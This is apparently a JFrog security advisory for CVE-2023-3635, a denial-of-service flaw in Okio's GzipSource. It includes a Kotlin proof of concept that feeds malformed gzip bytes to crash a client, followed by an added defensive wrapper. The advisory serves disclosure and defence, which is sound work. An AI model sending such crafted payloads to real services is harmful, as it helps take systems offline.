JFrog Security Research

XRAY-589879 - Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635 | CVSS 5.9

JFrog Severity: medium

Discovered by Uriya Yavnieli of the JFrog Security Research Team

Published 12 Jul, 2023 | Last updated 12 Jul, 2023

Okio GzipSource unhandled exception Denial of Service

Package: com.squareup.okio:okio

Affected versions: (,3.4.0)

GzipSource does not handle an exception that may be raised while parsing a malformed gzip buffer. An Okio client that decodes a crafted GZIP archive through the GzipSource class can therefore be taken down, resulting in denial of service.

import java.io.IOException
import okio.Buffer
import okio.ByteString
import okio.ByteString.Companion.decodeHex
import okio.GzipSource

fun main() {
    val gzBuf: Buffer = Buffer()
    try {
        // Malformed gzip header: correct ID1/ID2 magic (1f 8b) followed by an
        // invalid compression method (0x41) and a FLG byte with reserved bits set.
        val gzByteString: ByteString = "1f8b41ff424242424343ffff".decodeHex()
        gzBuf.write(gzByteString)
        val gz: GzipSource = GzipSource(gzBuf)
        val sinkBuf: Buffer = Buffer()
        // Only IOException is caught here; the exception raised while parsing
        // this header is not handled by GzipSource and escapes the caller.
        gz.read(sinkBuf, 5)
    } catch (e: IOException) {
        println("got error: " + e.toString())
    }
}
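The following is an added example, not code from the advisory or from the Okio project: a caller-side guard for applications that cannot yet move to 3.4.0. It funnels every failure raised while decoding through GzipSource into an IOException, so callers that only catch IOException keep running on malformed input, and it caps the decompressed size. The wrapper name, the exception class and the 1 MiB default are assumptions of this example.

```kotlin
import java.io.IOException
import okio.Buffer
import okio.ByteString
import okio.ByteString.Companion.decodeHex
import okio.GzipSink
import okio.GzipSource
import okio.buffer

// Hypothetical checked exception type for this example; wraps any non-IOException
// thrown by GzipSource so the caller sees one failure type for bad input.
class MalformedGzipException(cause: Throwable) :
    IOException("malformed gzip input: $cause", cause)

/** Decompresses [compressed] with GzipSource, reporting every decode failure as IOException. */
@Throws(IOException::class)
fun safeGunzip(compressed: ByteString, maxOutputBytes: Long = 1L shl 20): ByteString {
    val out = Buffer()
    try {
        GzipSource(Buffer().write(compressed)).use { gz ->
            while (true) {
                val n = gz.read(out, 8192L)
                if (n == -1L) break
                // Bound memory use regardless of what the archive claims to contain.
                if (out.size > maxOutputBytes) {
                    throw IOException("gzip output exceeds $maxOutputBytes bytes")
                }
            }
        }
    } catch (e: IOException) {
        throw e                          // already the type callers expect
    } catch (e: Exception) {
        throw MalformedGzipException(e)  // unchecked failure from a malformed buffer
    }
    return out.readByteString()
}

fun main() {
    // Well-formed input produced in-process with GzipSink round-trips normally.
    val good = Buffer().also { buf ->
        GzipSink(buf).buffer().use { it.writeUtf8("hello okio") }
    }.readByteString()
    println(safeGunzip(good).utf8())

    // The advisory's malformed header bytes now surface as an IOException
    // instead of escaping the caller's IOException handler.
    val bad = "1f8b41ff424242424343ffff".decodeHex()
    try {
        safeGunzip(bad)
    } catch (e: IOException) {
        println("rejected: ${e.message}")
    }
}
```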

No mitigations are supplied for this issue

Fix commit: https://github.com/square/okio/commit/81bce1a30af244550b0324597720e4799281da7b
